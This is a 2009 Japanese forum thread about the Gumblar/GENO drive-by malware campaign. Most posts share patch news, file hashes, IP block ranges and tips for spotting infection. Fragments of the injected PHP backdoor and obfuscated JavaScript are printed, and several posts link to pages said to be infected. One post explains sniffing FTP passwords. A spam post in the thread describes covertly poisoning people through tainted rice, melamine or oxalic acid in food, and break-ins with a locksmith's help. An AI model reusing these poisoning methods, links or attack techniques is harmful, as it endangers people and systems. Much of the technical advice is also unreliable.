http://pc11.2ch.net/test/read.cgi/notepc/1232024693/l50

★090406 複数板｢ウイルスGeno短縮URL｣誘導マルチポスト荒らし報告
http://qb5.2ch.net/test/read.cgi/sec2chd/1238968073/l50

【緊急警報】GENOなどのサイトでウイルス感染（２ちゃんに貼られた不明なリンクへも飛ぶべからず！！）
http://pc11.2ch.net/test/read.cgi/pcnews/1239034325/l50

IPAにso-netのセキュリティ通信が上手く纏まってるので見ろと
役立たずのIPAは解散しろと言っておきました

これで少なくとも把握してないと言う事にはならないでしょう

gumblarをブログに書いたら
その記事にLACからアクセスあったので
知らないとは言わせない(´・ω・)ｽ

# あとはJPCERTか?

結構、企業からも個人がアクセスしているだろうから、そのうちとんでもないことに

>>244
so-netのセキュリティ通信便利だよね、よくまとまってるし
一般人にもすすめ易い
必ずしも速報性はないけど大手にしては上出来
アンテナとしてキュリティホールmemo見てるけど、他の人にはすすめにくいからなあ
他に一般人向けでそこそこ情報補足が早いとこ知ってる人いる？

テレビやラジオで少しの時間で良いからインターネットのセキュリティに関するニュースを毎日流して欲しいと思っています。

>>247
一連の記事、なんか違和感があると思ったら、「Adobe」が軒並み[Adbe」に
なってるんだな。

>>249
ほんとだｗ
対策方法の情報ページのはじめの３つだけAdbeになってる
教えてあげたら寸志もらえるかな？ｗ

「ご指摘ありがとうございました」の返信だけだろ

これって検出するのはどうしたらいいの？

>>252
感染の可能性を低くする方法はあるが、検出できるかどうかは運次第。
どんどん新型に置き換わってるから、アンチウィルスもシグネチャベースの対応は
追いついていない。

じゃあおまえらは
どうやって気付いたの？

>>254
Chromeが遮断してくれた。運がよかった。

>>254
いつものようにGENOのサイトをひやかしにいったら、なんか重くてブラウザハングしたから
同じ様な奴を捜しに２ちゃんでスレ探して、ウィルス感染に気づいてクリーンインストールｗ

どんどん新型でてるなあ

それで結局、
どうやったら検出できるんだよ？？

あはは

これって
AdobeReader7.1.1 と
FlashPlayerを最新にすると感染しないの？

>>260
http://sourceforge.jp/developer/diary.php?diary_id=3950&diary_user=38633

>>260
http://sourceforge.jp/developer/diary.php?diary_id=3949&diary_user=38633

ttp://internet.watch.impress.co.jp/cda/news/2009/04/30/23328.html
（7.1.1以前）と書いてあるが・・?

この脆弱性は、
Adobe ReaderおよびAdobe Acrobatの
現行バージョンであるバージョン9.1および
8.1.4と、
旧バージョン（7.1.1以前）に影響があり、
Windows版、Mac版、Linux版の
すべてが影響を受けるとしている

最近落ち着いてるがいつ暴れだすか分からないからスレが閉じれない
まるでインフルエンザだウィルス繋がりでも

>>171もGENOっぽいけどserver.maido3.comは鯖が違うからセーフ？

adobeの対策版予定は今日だったな
時差の関係で夕方くらいかな?

H1N1よりもこっちのほうがpandemicになってるのに
マスコミは全く取り上げないな

都合の悪いことは先が見えるまで後回しが基本だからな

今日は月例UPdateだね

PowerPointしかないからどうでもいいけどな
それよりAdobe仕事しろ

Microsoftセキュリティ対策センター（MSRC）のブログによれば、
今回はOffice関連のアップデートとなるため、Windows Update経由では
配布せず、Microsoft Updateサービスを通じての提供となる。

　セキュリティ情報と併せて、悪意のあるソフトウェアの削除ツール
更新版と、セキュリティ以外のアップデートもリリース予定だ。

Windows７登場は年末にずれ込んだんですね

年末には何が起きるんでしょうかww

Windows7発売
豚インフルが変異し強毒性を得て大流行
世界的大恐慌
来年には世界的戦争状態に
もうﾒｼｳﾏで今からおしっこ漏れそうです

>>248
GENOみたいに対応を全くしないで放置してる情報が流れたらえらい事になりますｗ
短縮URLテロどころじゃないですよ

>>275
情報なしで、２ちゃんで感染サイトを貼り付けられまくると
感染者増えるじゃね？

しかしAdobeは糞だなぁ
Adobe ReaderもCommon Filesのadobe_update.exeも
自動更新はオフにしてるのにそれでも外に出ようとする
行儀悪すぎ

消せないファイルが残るしな

消せないファイルあったなー
どうやっても消せなくていろいろやったあとゴミ箱にドラックしたら普通に捨てれた

そのファイル、今ごろゴミ箱の中で繁殖してるぞ

windowsからじゃ消せなかった気がするが・・・
knoppixから消したんだけど、結局気持ち悪いからOSごと入れなおした
ゴミ箱ドラッグは試してなかったかも

あの有名動画サイトSayMove!がGenoウイルスに感染、アクセスした乞食どもやばいぞ
http://tsushima.2ch.net/test/read.cgi/news/1242145955/

ｷﾀ━━━━(ﾟ∀ﾟ)━━━━!!!

あの有名動画サイトSayMove!がGenoウイルスに感染、アクセスした乞食どもやばいぞ
http://tsushima.2ch.net/test/read.cgi/news/1242145955/

申し訳ありません。更新に使っていたPCが、
通称zlkon・GENOウイルスと呼ばれているウイルスの亜種に感染していたようです。
以下の時間帯に各ページにアクセスした方は感染の恐れが有ります。

5月12日　午前6時31分〜午前8：00頃
・ニコニコのぞき見検索のトップページ・ランキングページ・再生ページ以外のHTMLページ
・SayMove！のトップページ
同日　午前6時31分〜正午頃
・ニコニコのぞき見検索のマイリスト表示ページ


http://tokkablog.blog81.fc2.com/

http://say-move.net/
（現在は対処済み？）

Adobe Reader 9.1.1
ttp://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1.1/misc/AdbeRdrUpd911_all_incr.msp

sqlsodbc.chmってどうやってみつけるんだ？無いのだが･･･

感染しているか確認
どうやら感染するとC:\WINDOWS\system32\sqlsodbc.chmが上書きされる様子
これのハッシュ値を確認してみるといいかも
ファイルサイズが大きく違うのでよくわかんなかったらそっちでどうぞ
作成日時や更新日時は環境によってバラバラなのでとりあえず無視してもOK

正常なsqlsodbc.chm
ファイルサイズ：50,727バイト
CRC32：B61C7A80
MD5：F639AFDE02547603A3D3930EE4BF8C12
SHA-1：FBDD32ED13D27E4102621E1067FDF3634F33B2C3

上書きされたsqlsodbc.chmの例（あくまで例でありこの限りではない）
ファイルサイズ：1,323 バイト
CRC32：7585CBB6
MD5：BF7209B9589AD09A25740F6D47D0ADEA
SHA-1：D695F957AA9DEB0E4D92F4546DB3A883B1909008


とりあえずこれチェックして大丈夫なら安心だろ

僕達の感染はこれからだ！

GENO先生の次回作にご期待ください。

げろの名が大きく広まった事件であった
その事件は未だ解決までに至っていない

>>287
sqlsodbc.chmの正常な値はインストールされているSQL ServerやMSDEの
バージョンによって違うよ。

>>287
なんの意味もないチェックだろこれ

ttp://www.adobe.com/support/downloads/product.jsp?product=10&platform=Windows
Adobe Reader 9.1.1 Update - Multiple Languages     5/12/2009
Adobe Reader 8.1.5 Update - Multiple Languages          5/12/2009

これで安心？かな

>>287
んなアホな。

http://www.adobe.com/support/downloads/detail.jsp?ftpID=4447
Adobe Reader 7.1.2 Update - Multiple Languages      5/12/2009

今日仕事、一日中インストールしまくりだな

SayMove!について語るスレ　part2
http://pc12.2ch.net/test/read.cgi/streaming/1241252349/
SayMove!について語るスレ　part3
http://pc12.2ch.net/test/read.cgi/streaming/1242174048/
ぱらすての次はsaymoveの時代だ！【本スレ】
http://pc12.2ch.net/test/read.cgi/streaming/1239969531/

ウィルス感染してるか調べる明確な方法はないのだろうか

>>292
インストーラは9.1.0のままなので
[ヘルプ][アップデートの有無をチェック]で
9.1.1にしておくこと(とっくに9.1.0の人も)。

>>292のとこアップデートのあるよ

すまん、これのリンク先のこと
ttp://www.adobe.com/jp/support/security/bulletins/apsb09-04.html

Adobe Reader 7/8/9すべて対策が講じられたということでいいのかな？

んだね。もっともパッチ当てない奴が山ほどいそうだが。

進化したGENOウイルスがそれすらいずれ突破してきそうで怖いな

クライアントPCへの侵入経路が今ひとつわからないんだよな。
クライアントPCに対してもWebに仕込まれるのと同様、Adobeの
脆弱性を突かれてるんだろうか。

>>297
「アップデートサーバが応答していません。サーバが一時的にオフラインになっているか
インターネットまたはファイアウォール設定が正しくない場合があります。
後でもう一度やり直してください」

と出るんだがどうしたらいいの？
はぁ、もうこんな生活疲れたよ…

>>294 からパチ拾う。

>>299
だめだ、アクロバットリーダーの７のアップデートがあたんね
くそあどび

糞はお前だ・・・・。

全然おさまらないじゃん、GENOウイルス…

本番はこれからだ！GENOぉぉぉぉぉぉぉぉ！

スイマセン
フラッシュは最新版で
偶然にもアドビリーダー入れてなかったんですが
感染して無いでしょうか

感染してますん

誰かエスパー呼んでこいよ。

好きだと言い出せないうちに　あなたのロッカー奪ったラブレター

アンインストールするのが確実

ウイルスのこと何も分からない俺に教えてください・・・

GENOに感染して総再インスコしたんだけど
先にマカフィー入れてからアドビリーダーの最新版を入れようとしたら
バッファーのオーバーフローがどうのセキュリティ面に重大な問題がどうのと警告が出てインストール出来なかった
昨日発表されたパッチがあれば問題なくインストールできるのだろうか…

>>315

￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣｣
―――――――――――――‐┬┘
　　　　　　　　　　　 　 　 　 　 　 　 |
　　 　 　 ＿＿＿＿.＿＿＿＿ 　　 |　.＿＿　
　　　　　|　 　 　 　 | 　 　 　 　|　　 |　|＼＿＼　　
　　　　　|　 　 　 　 | ∧＿∧　|　　 |　|　 |.◎.｜　
　　　　　|　 　 　 　 |（　´∀｀）つ ミ |　|　 |.：　｜
　　　　　|　 　 　 　 |/ ⊃　 ﾉ　|　　 |　.＼|.≡.｜
　 　 　 　￣￣￣￣'￣￣￣￣　 　 |　　

>>315
ホムペ持ってないなら気にする必要なし。

adobe readerは8と9どっちがいいの？

>>316
こっちは、インストできたよ
こんなに大変な事態だとIPブロックをしないといけないなー
XPのファイアーウォールってIPブロックの機能ないんだろうか？

sqlsodbc.chmがないんですが、これは異常なんですか？
OSはVistaです

窓の杜 - 【NEWS】Adobe、4月末に公表済みの深刻な脆弱性を修正した「Adobe Reader」v9.1.1を公開
http://www.forest.impress.co.jp/article/2009/05/13/adobereader911.html

>>321
Vistaの場合はsqlsodbc.chmは
C:\Windows\Help\mui\0409
C:\Windows\Help\mui\0411
のどちらかにあると思うよ〜

>>318
>>5を見ればわかるけどサイト乗っ取りだけじゃなくゾンビ化するみたいだよ

このへんに出てる
http://www3.atword.jp/gnome/2009/05/09/oldschool-botnet-consists-new-malware-via-gumblar/
http://www3.atword.jp/gnome/2009/05/10/diagnostics-about-gumblars-trojan/

>>319
迷う理由がわからないけど特に8を使う理由がなければ
9で良いと思うよ

>>325
いや、特に8を使う理由はないんだけど、9は不具合が多いって
聞いたもんでｗ

ありがと

>>324
ゾンビ化…
厄介な。

>>323
ありがとうございます

9は開いた文書の数だけウィンドウが開いて、
タスクバーにボタンが作られるのが気に入らない

>申し訳ありません。更新に使っていたPCが、
>通称zlkon・GENOウイルスと呼ばれているウイルスの亜種に感染していたようです。
>以下の時間帯に各ページにアクセスした方は感染の恐れが有ります。
>
>5月12日　午前6時31分〜午前8：00頃
>・ニコニコのぞき見検索のトップページ・ランキングページ・再生ページ以外のHTMLページ
>・SayMove！のトップページ
>同日　午前6時31分〜正午頃
>・ニコニコのぞき見検索のマイリスト表示ページ

の件だけど、Vid-DLとかを経由で動画落しても、感染するの？

94.247.2.195(94.247.[2-3].[0-255])への接続を遮断
ってどうやるか判る人居ます？是非ご教授してほしいです

教示

>>332
間違えました＞＜

94.247.2.195(94.247.[2-3].[0-255])への接続を遮断
ってどうやるか判る人居ます？是非ご教示してほしいです

まず服を脱ぎます

>>303
不正なジャバスクリプトを仕込まれたページを閲覧する
ジャバスクリプト起動
アクロバットリーダー、もしくはフラッシュを起動
アクロバットのジャバスクリプト機能を起動
そこから侵入

>>331
ルーターかPG2（ソフト）でブロックしろ。

PG2でのブロックの仕方はリネージュ資料室辺りでも漁ってくれ。説明は面倒だ。
Vistaの場合は、PG2(英文のβ)入れただけじゃ駄目で、ローダー経由で起動しないと
実際の動作しないことにも注意。

うちは日本語化したPG2を常駐させてるなぁ
結構、役に立ってる

>>336
よくわかんないけど･･･情報ありがとう！調べてみる

もしこれ感染したの知らないままホームページ更新してたら
ソースにはなんて記述されてるの？

>>339
参考

<?php
if(!function_exists('tmp_lkojfghx')){
if(isset($_POST['tmp_lkojfghx3']))
以下略

*.jsすべての後ろに、
<!-- document.write(unescape('0F%3COjAsJvcriOjApJvtJv

今回のもラトビアとばされんのか？

>>340
ありがとう

とりあえずトレンドマイクロ　オンラインスキャン検出無し
sqlsodbc.chmハッシュ値確認正常
ホームページのソースに怪しい記述なし
pc再起動正常、cmdやregedit正常に起動

安心していいよな…

GENOウイルスって感染するとDドライブとかにも影響出るんでしょうか？
再インストしてカスペルスキーのオンラインスキャンかけたらもう検出はされなかったんですが
申し訳ないのですがどなたか教えていただけないでしょうか

>>343
データのバックアップができるぐらいだから
影響なかったはず

>>344
レス本当にありがとうございます。安心しました
一回再インストールかけたらフォルダの合計は普通なのにＨＤのプロパティで調べたら
１００Ｇ以上あったりしてすごく焦りました…
もう一度かけたら直ったのですがウイルス系にかかったのは初めてだったんで
色々と過敏になってしまってました

>>345
ウィルスのほうをバックアップしてなかったら、大丈夫

Macは感染しないよね？

Windows7は感染しないよね？

Vistaなら感染しない

>>346
あれ…不安になってきました
Ｄドライブを見て隠し含めてフォルダが無くカスペルスキーで
オンラインチェックして問題なかった場合はまず大丈夫と見て良い…でしょうか？

そろそろちゃんと報道されるかな？

628 シンフィアンドラ・ザンゼグラ(東日本) sage 2009/05/13(水) 23:48:57.86 ID:wuS3Hwtd(3)
小林製薬もGenoウィルスにやられてたのか。
シャレにならん事態だな。
http://www.kobayashi.co.jp/info/090512.html

クリーンインストールしない限り修復不能で、botnetに組み込まれてしまう
ような厄介な代物なのに、いつまで経ってもまともに報道されないのは
初期感染サイトが隠蔽したってのが大きいんだろうか。

国内の正規サイト改ざん：攻撃サイトを変え再襲来
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1884

　国内のWebサイトが次々に改ざんされ、閲覧者にウイルスを感染させようとする
悪質なJavaScriptが埋め込まれる問題が続いている。
　ラトビアに設置された攻撃サイトが4月末に閉鎖され、ひと安心と思ったのも束の
間、今度は「ｇｕｍｂｌａｒ．ｃｎ」というドメインにサイトを移して、攻撃を再開
したようだ。中国のドメイン名だが、サイトはロシアでホストされている。

■BIG-server.com
　ゼロ（札幌市厚別区）が運営するレンタルサーバーのBIG-server.com（中略）
■ウェルネス
　医療情報の提供やマーケッティングを行っているウェルネス（東京都文京区）（中略）
■ホースマンクラブ
　インターネットポイントサービスを行っている、へそクリック（横浜市西区）は7日、
　ホームページ上に掲載していた広告主で競馬情報の提供を行っているホースマンクラ
　ブのサイトが改ざんされ、不正なスクリプトが埋め込まれていたと発表。広告の掲載
　を中止（中略）


　攻撃サイトが変わり、最初にロードされるJavaScriptファイルまでが頻繁に更新
されている。ウイルス対策ソフトの対応が間に合わないようで、更新直後の検出率
は極めて低いという状態だ。（中略）

ここいらで一旦、一般人がやっておくべき対策をまとめようか

ロシアにいってサーバーを破壊すればいいんでは？

どんな症状がでるの？感染すると？

ロシアンマフィアの構成員になれて逮捕される

全身がもの凄くカユくなる

肩こりがなおる

タミフルで治るって舛添が言ってた。

　　　　　　　　∧∧
　　　　 　　ヽ(･ω･)/　 　ｽﾞｺｰ
　　　　 　＼(.＼ ノ
　　　　､ﾊ,,､　￣
　　　　￣

やっぱり有名どころが感染しないとダメなんだな　色んな意味で

どうやってサイトを改ざんしているかってのに興味ない奴多すぎるし書いても無視されるし
いいよ無視しろよ難しいことからは目をそむけて生きろよ、おまえらは
理解できる奴だけ理解してればいいよ、もう

ftpはパスワードが暗号化されてない
snifferで盗撮すれば簡単に他人のパスワードを盗める
botnet、又は複数のノードを持ってたり複数のプロバイダと契約してたり
いろんな経路でsnifferできる環境にある奴、又は組織なら
いろんなサイトを改ざんできる
さらにいろんな人のメールを盗み見ることも出来る
どのサイトを見たのかという情報も簡単に手に入る
ネットが匿名なんていってる奴は情弱
全裸で外を歩いているようなものだよ

avast先生が俺のPCを御助けくださった・・・
もう感謝するしかねえ

AVAST今回は頑張った

豚インフル並にたいした事なかったなｗ

>>365
GENO社員乙

>>351
大手企業だから詳細な説明してくれるといいんだが。

Adobe Readerをアンインストールしたよ。
代わりはPDF-XCHANGE VIEWER。

GENOウイルス

unescapeが含まれてたら警告出すとか、そういうのできないの？大体unescape含んでるんでしょ？

maido3.com/server/zousan/index.htmlに変なjsが組み込まれてるけど、
http://so.7walker.net/index.php?site=http%3A%2F%2Fwww.maido3.com%2Fserver%2Fzousan%2F&hua=
これって感染してる？

直リンしちゃだめでしょ

ごめんしてなかったか申し訳ない

商標と商号商標登録ホットライン
ttp://106hotline.com/guidance/kiso_syougou.html

↑
このページにアクセスすると、セキュリティソフト反応しますか？
私はavastを使っているんですが、「トロイ」の一種が検出されたんですが・・・

「JS:Redirector-H2」っていう名前なんですが、GENOウイルスの一種ですか？

ウゼエな

小林製薬もやられた？
http://www.kobayashi.co.jp/info/090512.html

間違ってクリックしちゃうから工夫して書いて・・・

>>376
>>351

http://とかごっそり削って書き込もうぜｗ

【小林製薬】一部Webサイトが第3者により改竄、ウイルススキャンのお願いとお詫び[05/12]
http://gimpo.2ch.net/test/read.cgi/owabiplus/1242212138/l50

>>374
思いっきりgumblarの文字が！！

>>380
gumblarって何ですか？

Genoって難読化の方法もいくつかパターンがあるんだな。

>>381
gumblarでこのスレを検索

>>383
このスレの書き込みを見たんですが、要するに
「gumblar.cn」ってサイトに接続させるようなスクリプトが
このページに含まれていたってことなんでしょうか？
↓
商標と商号商標登録ホットライン
ttp://106hotline.com/guidance/kiso_syougou.html

>>384
その通り。gumblar.cnからウィルス本体を送り込まれる。

>>385
なるほど・・・
それで、avastで検出されたウイルス名が「Redirector」だったわけか・・・
つまり、「再接続させる」って意味でしょうね

>>384
なんで>>377、>>378で言われてるのにまだそのままでリンク書いてるんだ？
わざとか？

ウイルスバスタースレでも悪用されてるぞ（本人か？）

http://pc11.2ch.net/test/read.cgi/sec/1242125567/355

355 名前：名無しさん＠お腹いっぱい。　[]　投稿日：2009/05/14(木) 11:11:51
商標と商号商標登録ホットライン
ttp://106hotline.com/guidance/kiso_syougou.html

↑
このページにアクセスすると、セキュリティソフト反応しますか？
私はavastを使っているんですが、「トロイ」の一種が検出されたんですが・・・
ウイルスバスターを使っている方はどうですか？

↑　ごめんそのまま貼っちゃった　リンク踏まないよう注意してください

なにやってんだかｗｗｗ

>>388
ちょｗ
自分で言っておいてｗ
何をやっているｗ

専ブラだとttpでもリンクになる場合が多いから危険すぎるな

申し訳ない　orz

>>387-388
ﾜﾛﾀ

ht tp://www.google.com/
こういう風に張ればいいんだよ

http部分いじったって、GreaseMonkeyスクリプトや専ブラで直リンになるしどうだっていいよ

>394
専ブラだとこれでも飛べちゃうんだよな

>>396
そうなんだ。chaikaだと>>394はリンクされない。

他のブラウザは知らんがIEならアドレスバーにコピペすれば
自動的にHTTPの文字が追加されるので
ｗｗｗから書けば良い

途中の「test」を「てすと」に代えるとかしないと駄目だね

hxxpでいいんじゃない？

b2rだけど、こういうのってカーソルもってっただけでもヤバイ？

www.example.com ←これをリンクにする専ブラもあるそうだ
ドットを●や■に変えるのをお勧め

ttp://www.fourteenforty.jp/products/origma.htm
＞　近年、Webページを閲覧する事により感染する「Drive-by-Download」マルウエアの問題が深刻化しています。
＞Webブラウザやプラグイン、アプリケーションの脆弱性を利用してシステムにインストールされる事例が多発しており

GENOウイルスのことですね。よくわかりました。ｗ

384のはこのスレに貼られる前からあちこちのスレに貼られてるな

↑気づいたのは今だよ

vista使いは丸腰でブラブラしてても良いのかね

＞＞406

よう俺
最近この話題知ったんだ

一応チェックはしておきたい

逆にこれはホームページを持ってるとわかりやすいってこと？
htmlアップロードすりゃ感染してるかどうかわかるよな？

ラトビア特急、ゆっくりと路線縮小中

2009/04/09(木)　 7560 個
2009/04/17(金)　 8567 個
2009/04/19(日)　11795 個
2009/04/27(月)　15096 個
2009/04/30(木) 13456 個
2009/05/14(木) 12314 個のドメインを感染させています。

中々収束しないな orz

違う。
clientとserverの違いを考えろ。
お前はclientだろうが

>>386
> つまり、「再接続させる」って意味でしょうね
> つまり、「再接続させる」って意味でしょうね
> つまり、「再接続させる」って意味でしょうね

「俺スルドイこと言った」とか思ってる？

>>409
インフルの感染者を見ているようだ

【ネット】 小林製薬ウェブサイトの一部でサイト改ざん、現在は閉鎖　　閲覧者にはウイルス感染の恐れ [09/05/12]
http://anchorage.2ch.net/test/read.cgi/bizplus/1242271601/

>>409
これは延べ数?

汚染米とラジコン
http://gimpo.2ch.net/test/read.cgi/radiocontrol/1212811357/337-
http://gimpo.2ch.net/test/read.cgi/bouhan/1239734019/20-
カビ毒米って便利いいよね。
普通に食べて肝臓癌にして殺すことできるもんね。
気づかれずに何度も侵入、そのたびに米びつのお米をカビ毒米と交換、
後マヨネーズや醤油、ソース、ケチャップ、みりんなどなど毎日少しずつ使うものに弱毒性の毒物を入れておく。
ターゲットは一年以内にアポーン。
気づかれそうになったら若年性統合失調症とか何とかいえば誤魔化せます。
http://www.tk-telefilm.co.jp/gaslight.html
　　夜になると不思議と暗くなる部屋のガス灯…それに気づくのは私だけ…。
　　精神的に追詰められる心理サスペンスの傑作！　　
昔々から精神病ってエロエロと利用し甲斐があるようで、、、、
　ガスライティング----で検索　ガス燈の映画の影響か欧州ではよく知られた方法
メラミンやシュウ酸の粉末を砂糖や塩、牛乳に混入。確実に結石(総胆管結石、尿管結石)になる。
あかちゃんなら異物混入が疑われるが40代50代なら本人の病気ですんでしまう。
あと降圧剤や昇圧剤、利尿剤などなどいろいろあるみたいだね。
これらは砒素のように明らかな毒物でもないから発見されても犯罪の立証がむずい。
薬物毒物と鍵屋の組み合わせは非常に厄介だ。
プロの鍵屋にかかれば開かない鍵はないといわれている。
皆さま、家族全員が留守にする時はお気をつけあそばせ。
あと、尿酸とある種の(現在不明)ある種の薬物を加えると膝痛や腰痛を起こすことが出来るようだ。
重いものを持っていないのに急に腰が痛くなったなどというとき、
ひょっとすると、ひょっとするかもしれませんよ。
旅先での見も知らない人からのドリンクサービスや席を外したあとの飲み物なども危険がいっぱいですよ。
泊りがけの飛行会の後体調異変はありませんか。
---------------------------------------------
みんな気をつけようね。
どんな一流の鍵屋でも無傷で開けられない鍵作らないと、、
現状では一流の鍵屋ならどんな鍵も開けてしまう。
暴力団が借金漬けの鍵屋を支配下に置いたらやりたい放題だよ。

感染の確認方法は？

>>414
延べ数なら減らないだろ

gumblar.cnへの接続を遮断してもダメ？

まだ感染してない人はバックアップ取っとけよ、新規インスコは設定がめんどい
もちろんほとんどの人は設定済みリカバリ用意してるだろうけど

gumblar.cnにaguseで行ったらadblockのgumblar.cnカウントが5になってんだけど
これ大丈夫だよね？
もしabblockでgumblar.cnをブロックしてないと、abuseでgumblar.cn見ても駄目なんじゃ？

〉〉419

感染の真偽はまだわからないが、
リカバリーディスク作ってなかった僕はどうすればいいでしょうか？

>>421
クリーンインストール

プリインストールじゃなければいいけど

>>420
まじだな
aguseで怪しいサイト踏みまくったんだが・・・・
おれもgumblar.cnがカウントされてた

〉〉423

プリインストールでした本当に(ry

詰んだか？ＯＳはVISTAだけども、、、
後処置法何かある？

すまん、Adobe　Acrobatとreaderってどう違う？
プログラムの削除画面で、Acrobatがなくてreaderしかないんだが、readerだけアップデートしとけば良いってことなんだろうか？

>>426
Acrobatは有償の製品版。PDF作成機能がある。

>>420>>424
マジか
ヤバすぎるだろaguse

誰か>>304にも答えてほしいです。
vistaだしjavaスクリプトも切ってるから一応このままアップデートしなくても大丈夫かな・・・？

>>425
VistaでGenoに感染したのなら、初の例じゃないか？
JavascriptはVer.6以上のWindowsをはねてるし。

read：読む[er]

readerが9.1.0ならreader開いてヘルプのとこから9.1.1にアップデートできる
あと設定からAdobereaderJavaScriptも切っとけ

http://www.google.com/safebrowsing/diagnostic?site=94.247.2.195
2009/04/09(木)　 7560 個
2009/04/17(金)　 8567 個
2009/04/19(日)　11795 個
2009/04/27(月)　15096 個
2009/04/28(火)　13612 個
2009/05/03(日)　13456 個
2009/05/14(木)　12314 個のドメインを感染させています。

http://www.google.com/safebrowsing/diagnostic?site=gumblar.cn
2009/05/03(日)　　623 個
2009/05/06(水)　 1108 個
2009/05/07(木)　 1951 個
2009/05/08(金)　 1437 個
2009/05/09(土)　　648 個
2009/05/14(木)　　 24 個のドメインを感染させています。

>>430
そっか。XPでもUAを偽装しておけばGenoを防げるなｗ

>>420
怖いからVMwareでやってみた
俺もgumbarがカウントされてることを確認した・・・・

>>427>>431
わかった。あり。

>>430

いやまだカスペチェックしてないからワカラン

しかしＩＥがよく落ちたりするからさ

感染の確認方法おしえろやクズ

>>437
クズに教えを請うなんて恥ずべきことだぞ

再起動して戻ってこれたら感染してない

千葉女どこいっちゃったの
寂しいから出てこいよ

???

もしかしたら自分の質問は初心者すぎるからスルーされているのかな、と思うので
セキュリティ初心者質問スレに移動してよかですか？
マルチになる？

該当バージョンのアップデートを>>292でDLできないか

>>420
>adblockのgumblar.cnカウントが5になってんだけど

これってフィルタに「gumblar.cn」って入れてるってこと？

>>443
すんません、できました。
騒いで申し訳ないです。
有難うございます。

>>420
「gumblar.cn」をフィルタリングしてるなら
aguseで編集したアドレスにgumblar.cnという文字列が含まれるからだと思われ

gumblar.cnのIP「94.229.65.160 - 94.229.65.191」がブロックはアクセスしてないし
ブロックもカウントされなかったから、そういうこと

>>444
>>446
安心した　ありがとう

すみません、もうちょっとだけ質問。
>>297はあまり気にしなくてもOK？
確かにプロパティみると9.1のままだけど。

Adobe Readerを使う時だけインストして使い終わったらアンインストすればいいんじゃないか
すげええ面倒だけど

>>449
えっ

>>446
何だaguseのアドレスに反応しただけか！
あー安心したありがとう

>>448
Adobe Reader 9.1.1 Update - Multiple Languagesはやった？

>>450
えっ

>>447
安心したついでに質問だけどいいかな
adblockのフィルタリングはこんな感じでいいのかな

*/94.229.[64-65].[0-255]/*
*/94.247.[2-3].[0-255]/*

>>413
GENOだね

なにそれこわい

>>454
ttp://www3.atword.jp/gnome/zlkon-gumblar-%E5%95%8F%E9%A1%8C%E3%81%AB%E9%96%A2%E3%81%97%E3%81%A6/

ここの下のほうの焼却炉ってところにたくさん禁止したほうがいいアドレスあるから使ってみたらどうだい？

だけどabblockよりルーターとかPCのFWに設定しておいたほうよさそう
何か俺が勘違いしていたらごめんね

>>454
ttp://web-g.org/post/95186717
ここ見て*/94.247.[2-3].[0-255]/*は入れたんだけど
*/94.229.[64-65].[0-255]/*も入れた方がいいの？

自分も知りたいから、詳しい人お願いしますm(_ _)m

JavaScriptの正規表現だからそれでOK
/*とか無くてもいい

Adobe Readerを使う時だけインストして使い終わったらアンインストすればいいんじゃないか
すげええ面倒だけど

aguseの件はマジびびった。
ミイラ取りが。。になったかとおもたよ

>>454
これってoperaの場合どうやればいいの？

adblockにIPアドレスベースのアクセスフィルタ機能はないでしょ

425だが、

OSvistaでGENO大丈夫かと思うが心配だから
カスペ使おうと思ったがセキュリティソフトがマカフィで機能の一時停止ができない、、

他にできる確認方法ある？
WINDOWSのsqlsodbc.chmのチェックくらい？
探してもないんだが、、

>>459
>>463

どっちが正しいの？

踏んでみれば分かる

>>466
えええええええええええええええええ

カスペのオンラインスキャンの事を言ってるなら
ニフティのが同一らしいのでそっち使うといい

>>448
ヘルプ＞アクロバットリーダー９について　の所で
バージョン9.11になっていなければパッチ適用されてない

>>413
＞小林製薬によれば、ユーザーが感染した恐れがあるのはダウンローダー型のトロイの木馬。主な動作としては、
＞改ざんされたページにアクセスした場合、別のページからウイルスやスパイウェアをダウンロードするという。
＞また、感染した場合には、「sqlsodbc.chm（C:\WINDOWS\system32\sqlsodbc.chm）が改変されるほか、
＞コマンドプロンプトとレジストリエディタが起動不能になることが確認されている

ああ、間違いないGENOだ。

>>436
カスペのサポセンに聞いたらチェックする時に設定を推奨レベルではなく高にして
何度かやってみてくれと言われた。それで感染の有無が分かるはずだってさ

>>471
オンラインスキャンでも同じ？

てかわざわざサンクス

>>464
ニフティのがカスペエンジンだったはず。
そっち使ってみては？

>>473
サンクス

>>466
俺xpだから、だれかadblock入れてる人>>454のフィルタ入れて>>384踏んでみてよ
お願いします

>>413
小林製薬はこのウイルスに面白いネーミングをつけてくれるはず

>>452
はい。>>292さんの所からやりました。
更新日時も今日の15時ぐらいになってます。
でも9.1（9.10のことですよね）のままです。

>>468
>>452
9.1.１になってました！
ほんとーーーに有難うございます!

>>469
ｽﾏｿ間違えた。
本当に有難う！

どんなソフトも大体そのへんにバージョン表示されるからｗ

>>477
Product Adobe Reader
Version 9.1.1
Platform Windows
File Name AdbeRdrUpd911_all_incr.msp
File Size 1168 KB

これだぞ　ttp://www.adobe.com/support/downloads/detail.jsp?ftpID=4452

感染してた！
sqlsodbc.chm見事に改変されてるううう

クリーンインストールしてくる…

>>482
いってら〜

WinXPつかっててGDATAがアクセス拒否した。

ウェブサイトがブロックされました。
G DATA InternetSecurity 2009 がこのウェブサイトへのアクセスを拒否しました。
このサイトは感染しています。感染コード： JS:Redirector-H2 [Trj] (エンジン B)

保存してソース見たかったけどそれも出来なかった(拒否される)からエミュのWindows98でアクセスしないように保存して、ソース見た。

ttp://ghard.run.buttobi.net/1.jpg

…これ？　エミュでもアクセスして感染するとハードディスクファイルを戻すのが面倒だからね、、、
Javascriptはいつも切ってるけどこれなら感染しないのかな。

めっさ伸びとる

>>470
ファイル実行regeditで
起動すればセーフって事？

ガチでパニックが起きそうだな

>>285

インフルよりアレかもね。

http://update.microsoft.com/microsoftupdate/v6/itemdetails.aspx?iPage=1&index=0&ln=ja
これだめなん？

あっちはいまのところ他人事だけど、こっちは目の前の火事だからな

ワクチンないもんね。
フルインスコでなおるつっても邪魔くさいし。

とにかくここに書いてあるIPを範囲焼き

ttp://www3.atword.jp/gnome/2000/01/13/block-list/

薬事日報→小林製薬という流れか？

笑い男事件

>>480
そうなんですね。
全然知らなかった。
一つ賢くなったよ、有難う。
>>481
はい。
それやりました。
URLが紫になってます。


「URLが紫になってます。」だって。
初心者すぎて自分で泣けてくる。

>>374-
乙です

一応、電凸して対応する様伝えました

>>497
電凸した反応はどうだった？

